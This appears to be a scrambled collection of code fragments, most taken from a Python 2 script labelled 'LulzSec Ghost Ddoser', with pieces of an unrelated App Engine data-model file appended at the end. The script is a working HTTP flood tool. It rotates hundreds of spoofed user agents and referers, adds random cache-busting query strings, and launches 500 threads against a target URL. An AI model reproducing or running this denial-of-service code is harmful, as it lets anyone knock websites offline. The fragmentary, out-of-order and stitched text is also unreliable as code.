(Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02", "'' for i in range(0, size): a = random.randint(65, 90) out_str += chr(a)", "Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;')", "by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2')", "headers_useragents.append('PDXGW/1.0') 
headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML,", "U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1')", "headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc')", "NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", "urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url)", "1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com", "2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR", "\\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | : O ._O O_. 
O ._O", "Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2')", "(aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2')", "Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0", "com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE-", "chr(a) return(out_str) def usage(): print 'Pra usar python Lulz.py <url>' print 'LulzSec Ghost", "(Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4;", "| \\ \\ / / :_| ;`-._; __..--'; : : / ( ;|;-./_", "(KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)')", "headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; 
http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net", "`.`.) _,' |;._:: | | | | `| : `' ,' `. /", "headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT", "headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0", "v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot", "headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1", "4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)')", "crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0')", "headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )')", "bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") 
bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\")", "except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK", "Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36", "url) host = m.group(1) for i in range(500): t = HTTPThread() t.start() t", "A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us;", "a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup')", "Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0", "en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru)", "(PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101", "6.1; rv:26.0) Gecko/20100101 Firefox/26.0 
IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;", "tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)')", "like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19", "search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x')", "CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML", "Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada da", "random ascii string def buildblock(size): out_str = '' for i in range(0, size):", "Search Engine; acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)')", "U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16')", "| / ' | / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | |", "headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet", "thread class HTTPThread(threading.Thread): def 
run(self): try: while flag<2: code=httpcall(url) if (code==800) & (safe==1):", "libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0')", "/ :_| ;`-._; __..--'; : : / ( ;|;-./_ _/.-:'o | / '", "sys import threading import random import re #global params url='' host='' headers_useragents=[] headers_referers=[]", "- obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot", "V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)')", ",' / ~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _// _// ~ _//", "headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta", "Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like", "keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X')", "| \\ 
\\ _|/| \\ /-./_ \\; \\ \\,;' \\ ,\\ / \\:", "= random.randint(65, 90) out_str += chr(a) return(out_str) def usage(): print 'Pra usar python", "<EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler", "Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone')", "headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista", "OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS", "Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS", "class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2)", "273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 
260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh;", "WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def", "headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows;", "headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider')", "(compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE;", "| || ' : `.`.) 
_,' |;._:: | | | | `| :", "headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')", "m.group(1) for i in range(500): t = HTTPThread() t.start() t = MonitorThread() t.start()", "v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan')", "Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009)", "- http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0", "import urllib2 import sys import threading import random import re #global params url=''", "NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0;", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile", "libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0')", "like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0", "(Linux; Android 
4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "safe=1 # generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows;", "8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET", "#builds random ascii string def buildblock(size): out_str = '' for i in range(0,", "headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300", "safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag flag=val def set_safe():", "(PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0", "Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6')", "'Pra usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script", "headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0", "request_counter request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global safe safe=1 #", "keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') 
keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter", "7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus", "x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30')", "_// ~ _// ~ ~ / / / / / / / /", "/ ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list()", "like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer", "headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr;", "if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) +", "headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)')", "6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows", "headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') 
headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios", "artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot", "a = random.randint(65, 90) out_str += chr(a) return(out_str) def usage(): print 'Pra usar", "flag flag=val def set_safe(): global safe safe=1 # generates a user agent array", "http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered", "MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ", "http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev.", "= url + \"/\" m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i", "headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19')", "`--. 
) /|-._: : | \\ \\ / / :_| ;`-._; __..--'; :", "#http request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request", "CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750')", "headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your", "by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0')", "if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada da LulzSec Ghost\" if", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')", 
"Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36')", "headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA;" ]
[ "with open(path) as csvfile: df = pd.read_csv(csvfile) url = df['url'] products = extract_products_json(url)", "'./stores.csv' import pandas as pd from shopify import extract_products_json result = '' with", "extract_products_json result = '' with open(path) as csvfile: df = pd.read_csv(csvfile) url =", "result = '' with open(path) as csvfile: df = pd.read_csv(csvfile) url = df['url']", "open(path) as csvfile: df = pd.read_csv(csvfile) url = df['url'] products = extract_products_json(url) print(products)", "= '' with open(path) as csvfile: df = pd.read_csv(csvfile) url = df['url'] products", "as pd from shopify import extract_products_json result = '' with open(path) as csvfile:", "= './stores.csv' import pandas as pd from shopify import extract_products_json result = ''", "shopify import extract_products_json result = '' with open(path) as csvfile: df = pd.read_csv(csvfile)", "import extract_products_json result = '' with open(path) as csvfile: df = pd.read_csv(csvfile) url", "'' with open(path) as csvfile: df = pd.read_csv(csvfile) url = df['url'] products =", "path = './stores.csv' import pandas as pd from shopify import extract_products_json result =", "from shopify import extract_products_json result = '' with open(path) as csvfile: df =", "pd from shopify import extract_products_json result = '' with open(path) as csvfile: df", "pandas as pd from shopify import extract_products_json result = '' with open(path) as", "import pandas as pd from shopify import extract_products_json result = '' with open(path)" ]
[ "result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t = type(obj) if", "query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty()", "'\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result =", "% ','.join(props) elif (t is int) or (t is long): return str(obj) elif", "def to_json(obj): t = type(obj) if t is dict: props = [ ]", "[ ] for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}'", "= [ ] for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return", "in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t is", ":2 AND serial < :3', suite, start, end) return query.fetch(end - start) class", "AND serial < :3', suite, start, end) return query.fetch(end - start) class Suite(db.Model):", "lookup_range(suite, start, end): query = Case.gql('WHERE suite = :1 AND serial >= :2", "google.appengine.ext import db import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b':", "str) or (t is unicode): return '\"%s\"' % json_escape(obj) elif (t is list):", "dict: props = [ ] for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key),", "return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative':", "found in the LICENSE file. 
from google.appengine.ext import db import cStringIO _ESCAPEES =", "to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created =", "_ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n',", "(t is list): return '[%s]' % ','.join([to_json(o) for o in obj]) elif t", "Suite.gql('WHERE name = :1', suite) return query.get() def to_json(self): return to_json({'name': self.name, 'count':", "'\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result = [] for c in", "return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query =", "obj]) elif t is bool: if obj: return '1' else: return '0' else:", "suite = db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def", "(t is long): return str(obj) elif (t is str) or (t is unicode):", "Copyright 2009 the Sputnik authors. All rights reserved. # This code is governed", "'\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' }", "ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t = type(obj) if t is", "return '{%s}' % ','.join(props) elif (t is int) or (t is long): return", "governed by the BSD license found in the LICENSE file. from google.appengine.ext import", "= Case.gql('WHERE suite = :1 AND serial = :2', suite, serial) return query.get()", "= db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name,", "in the LICENSE file. 
